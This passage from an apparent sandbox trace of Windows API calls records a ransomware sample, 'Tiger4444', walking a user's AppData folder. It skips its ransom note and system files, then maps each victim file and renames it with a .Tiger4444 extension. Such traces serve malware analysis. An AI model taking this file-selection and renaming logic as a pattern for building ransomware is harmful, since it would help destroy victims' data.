"c:\\users\\fd1hvy\\appdata\\roaming\\cbpbim.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.970] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.971] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14142363764) returned 1 [0049.971] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=13282) returned 1 [0049.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0049.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0049.971] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x36f0, lpName=0x0) returned 0x2c8 [0049.971] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x36f0) returned 0xbe0000 [0049.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.971] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.972] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.972] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.972] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.972] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14142480993) returned 1 [0049.972] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0049.972] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0049.972] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.972] CloseHandle (hObject=0x2c8) returned 1 [0049.972] CloseHandle (hObject=0x260) returned 1 [0049.973] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CBpBim.docx.Tiger4444") returned 53 [0049.973] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CBpBim.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cbpbim.docx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CBpBim.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cbpbim.docx.tiger4444"), dwFlags=0x1) returned 1 [0049.974] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc547af0, ftCreationTime.dwHighDateTime=0x1d4cf0b, ftLastAccessTime.dwLowDateTime=0x708c9ef0, ftLastAccessTime.dwHighDateTime=0x1d4d3f1, ftLastWriteTime.dwLowDateTime=0x708c9ef0, ftLastWriteTime.dwHighDateTime=0x1d4d3f1, nFileSizeHigh=0x0, nFileSizeLow=0xea92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DBhjSCY L-6dupKa.mkv", cAlternateFileName="DBHJSC~1.MKV")) returned 1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="Tiger4444.exe") returned -1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2=".") returned 1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="..") returned 1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="windows") returned -1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="bootmgr") returned 1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="pagefile.sys") returned -1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="boot") returned 1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="ids.txt") returned -1 [0049.974] lstrcmpiW (lpString1="DBhjSCY L-6dupKa.mkv", lpString2="NTUSER.DAT") returned -1 [0049.974] lstrcpyW (in: lpString1=0x30aeae8, lpString2="DBhjSCY L-6dupKa.mkv" | out: lpString1="DBhjSCY L-6dupKa.mkv") returned="DBhjSCY L-6dupKa.mkv" [0049.974] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DBhjSCY L-6dupKa.mkv", dwFileAttributes=0x0) returned 1 [0049.974] lstrlenW (lpString="DBhjSCY L-6dupKa.mkv") returned 20 [0049.974] lstrlenW (lpString="Tiger4444") returned 9 [0049.974] lstrcmpiW (lpString1="dupKa.mkv", lpString2="Tiger4444") returned -1 [0049.974] lstrlenW (lpString=".dll") returned 4 [0049.974] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0049.974] lstrlenW (lpString=".lnk") returned 4 [0049.974] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0049.974] lstrlenW (lpString=".ini") returned 4 [0049.974] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0049.974] lstrlenW (lpString=".sys") returned 4 [0049.974] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0049.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DBhjSCY L-6dupKa.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dbhjscy l-6dupka.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.975] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.975] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14142778283) returned 1 [0049.975] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=60050) returned 1 [0049.975] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0049.975] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0049.975] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xeda0, lpName=0x0) returned 0x2c8 [0049.975] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeda0) returned 0xbe0000 [0049.976] CryptAcquireContextW (in: phProv=0x30abb40, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30abb40*=0xc720c0) returned 1 [0049.976] CryptGenRandom (in: hProv=0xc720c0, dwLen=0x80, pbBuffer=0x30abb5c | out: pbBuffer=0x30abb5c) returned 1 [0049.977] CryptReleaseContext (hProv=0xc720c0, dwFlags=0x0) returned 1 [0049.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0049.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0049.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.977] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14143014271) returned 1 [0049.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0049.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0049.977] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.978] CloseHandle (hObject=0x2c8) returned 1 [0049.978] CloseHandle (hObject=0x260) returned 1 [0049.978] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DBhjSCY L-6dupKa.mkv.Tiger4444") returned 62 [0049.978] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DBhjSCY L-6dupKa.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dbhjscy l-6dupka.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DBhjSCY L-6dupKa.mkv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dbhjscy l-6dupka.mkv.tiger4444"), dwFlags=0x1) returned 1 [0049.979] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef447870, ftCreationTime.dwHighDateTime=0x1d4d050, ftLastAccessTime.dwLowDateTime=0x9f0d8930, ftLastAccessTime.dwHighDateTime=0x1d4ca17, ftLastWriteTime.dwLowDateTime=0x9f0d8930, ftLastWriteTime.dwHighDateTime=0x1d4ca17, nFileSizeHigh=0x0, nFileSizeLow=0xbd11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dM 1hRjzd1jrBH8W.flv", cAlternateFileName="DM1HRJ~1.FLV")) returned 1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="Tiger4444.exe") returned -1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2=".") returned 1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="..") returned 1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="windows") returned -1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="bootmgr") returned 1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="pagefile.sys") returned -1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="boot") returned 1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="ids.txt") returned -1 [0049.979] lstrcmpiW (lpString1="dM 1hRjzd1jrBH8W.flv", lpString2="NTUSER.DAT") returned -1 [0049.979] lstrcpyW (in: lpString1=0x30aeae8, lpString2="dM 1hRjzd1jrBH8W.flv" | out: lpString1="dM 1hRjzd1jrBH8W.flv") returned="dM 1hRjzd1jrBH8W.flv" [0049.979] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\dM 1hRjzd1jrBH8W.flv", dwFileAttributes=0x0) returned 1 [0049.979] lstrlenW (lpString="dM 1hRjzd1jrBH8W.flv") returned 20 [0049.979] lstrlenW (lpString="Tiger4444") returned 9 [0049.979] lstrcmpiW (lpString1="rBH8W.flv", lpString2="Tiger4444") returned -1 [0049.979] lstrlenW (lpString=".dll") returned 4 [0049.979] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0049.979] lstrlenW (lpString=".lnk") returned 4 [0049.979] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0049.979] lstrlenW (lpString=".ini") returned 4 [0049.979] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0049.979] lstrlenW (lpString=".sys") returned 4 [0049.979] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0049.979] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\dM 1hRjzd1jrBH8W.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dm 1hrjzd1jrbh8w.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.980] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.980] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14143332875) returned 1 [0049.980] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=48401) returned 1 [0049.980] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0049.980] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0049.980] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc020, lpName=0x0) returned 0x2c8 [0049.980] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc020) returned 0xbe0000 [0049.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0049.982] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0049.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.983] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0049.983] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.983] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0049.983] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14143592028) returned 1 [0049.983] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0049.983] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0049.983] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.984] CloseHandle (hObject=0x2c8) returned 1 [0049.984] CloseHandle (hObject=0x260) returned 1 [0049.987] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\dM 1hRjzd1jrBH8W.flv.Tiger4444") returned 62 [0049.987] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\dM 1hRjzd1jrBH8W.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dm 1hrjzd1jrbh8w.flv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\dM 1hRjzd1jrBH8W.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dm 1hrjzd1jrbh8w.flv.tiger4444"), dwFlags=0x1) returned 1 [0049.987] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00e3760, ftCreationTime.dwHighDateTime=0x1d4cc3a, ftLastAccessTime.dwLowDateTime=0xa9c689f0, ftLastAccessTime.dwHighDateTime=0x1d4d4bf, ftLastWriteTime.dwLowDateTime=0xa9c689f0, ftLastWriteTime.dwHighDateTime=0x1d4d4bf, nFileSizeHigh=0x0, nFileSizeLow=0x823f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DNvzavLWq s3Oc_A UaC.gif", cAlternateFileName="DNVZAV~1.GIF")) returned 1 [0049.987] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.987] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.987] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="Tiger4444.exe") returned -1 [0049.987] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2=".") returned 1 [0049.988] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="..") returned 1 [0049.988] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="windows") returned -1 [0049.988] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="bootmgr") returned 1 [0049.988] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="pagefile.sys") returned -1 [0049.988] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="boot") returned 1 [0049.988] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="ids.txt") returned -1 [0049.988] lstrcmpiW (lpString1="DNvzavLWq s3Oc_A UaC.gif", lpString2="NTUSER.DAT") returned -1 [0049.988] lstrcpyW (in: lpString1=0x30aeae8, lpString2="DNvzavLWq s3Oc_A UaC.gif" | out: lpString1="DNvzavLWq s3Oc_A UaC.gif") returned="DNvzavLWq s3Oc_A UaC.gif" [0049.988] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DNvzavLWq s3Oc_A UaC.gif", dwFileAttributes=0x0) returned 1 [0049.988] lstrlenW (lpString="DNvzavLWq s3Oc_A UaC.gif") returned 24 [0049.988] lstrlenW (lpString="Tiger4444") returned 9 [0049.988] lstrcmpiW (lpString1="A UaC.gif", lpString2="Tiger4444") returned -1 [0049.988] lstrlenW (lpString=".dll") returned 4 [0049.988] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0049.988] lstrlenW (lpString=".lnk") returned 4 [0049.988] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0049.988] lstrlenW (lpString=".ini") returned 4 [0049.988] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0049.988] lstrlenW (lpString=".sys") returned 4 [0049.988] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0049.989] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DNvzavLWq s3Oc_A UaC.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dnvzavlwq s3oc_a uac.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.989] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.989] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14144218654) returned 1 [0049.989] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=33343) returned 1 [0049.989] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0049.989] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0049.989] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8540, lpName=0x0) returned 0x2c8 [0049.989] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8540) returned 0xbe0000 [0049.990] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.990] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0049.991] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.991] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0049.991] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.991] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0049.991] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.991] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0049.991] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14144426403) returned 1 [0049.991] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0049.991] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0049.991] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.992] CloseHandle (hObject=0x2c8) returned 1 [0049.992] CloseHandle (hObject=0x260) returned 1 [0049.993] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DNvzavLWq s3Oc_A UaC.gif.Tiger4444") returned 66 [0049.993] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DNvzavLWq s3Oc_A UaC.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dnvzavlwq s3oc_a uac.gif"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DNvzavLWq s3Oc_A UaC.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dnvzavlwq s3oc_a uac.gif.tiger4444"), dwFlags=0x1) returned 1 [0049.994] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed02d0e0, ftCreationTime.dwHighDateTime=0x1d4d3f5, ftLastAccessTime.dwLowDateTime=0x1ee01940, ftLastAccessTime.dwHighDateTime=0x1d4c76e, ftLastWriteTime.dwLowDateTime=0x1ee01940, ftLastWriteTime.dwHighDateTime=0x1d4c76e, nFileSizeHigh=0x0, nFileSizeLow=0xef5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fADueh5_.png", cAlternateFileName="")) returned 1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="Tiger4444.exe") returned -1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2=".") returned 1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="..") returned 1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="windows") returned -1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="bootmgr") returned 1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="pagefile.sys") returned -1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="boot") returned 1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="ids.txt") returned -1 [0049.994] lstrcmpiW (lpString1="fADueh5_.png", lpString2="NTUSER.DAT") returned -1 [0049.994] lstrcpyW (in: lpString1=0x30aeae8, lpString2="fADueh5_.png" | out: lpString1="fADueh5_.png") returned="fADueh5_.png" [0049.994] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\fADueh5_.png", dwFileAttributes=0x0) returned 1 [0049.995] lstrlenW (lpString="fADueh5_.png") returned 12 [0049.995] lstrlenW (lpString="Tiger4444") returned 9 [0049.995] lstrcmpiW (lpString1="ueh5_.png", lpString2="Tiger4444") returned 1 [0049.995] lstrlenW (lpString=".dll") returned 4 [0049.995] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0049.995] lstrlenW (lpString=".lnk") returned 4 [0049.995] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0049.995] lstrlenW (lpString=".ini") returned 4 [0049.995] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0049.995] lstrlenW (lpString=".sys") returned 4 [0049.995] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0049.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\fADueh5_.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fadueh5_.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.995] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.995] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14144826888) returned 1 [0049.995] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=61276) returned 1 [0049.995] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0049.995] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0049.995] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf260, lpName=0x0) returned 0x2c8 [0049.995] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf260) returned 0xbe0000 [0049.997] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.997] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0049.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.997] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0049.997] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.998] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0049.998] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.998] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0049.998] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14145076478) returned 1 [0049.998] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0049.998] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0049.998] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.998] CloseHandle (hObject=0x2c8) returned 1 [0049.998] CloseHandle (hObject=0x260) returned 1 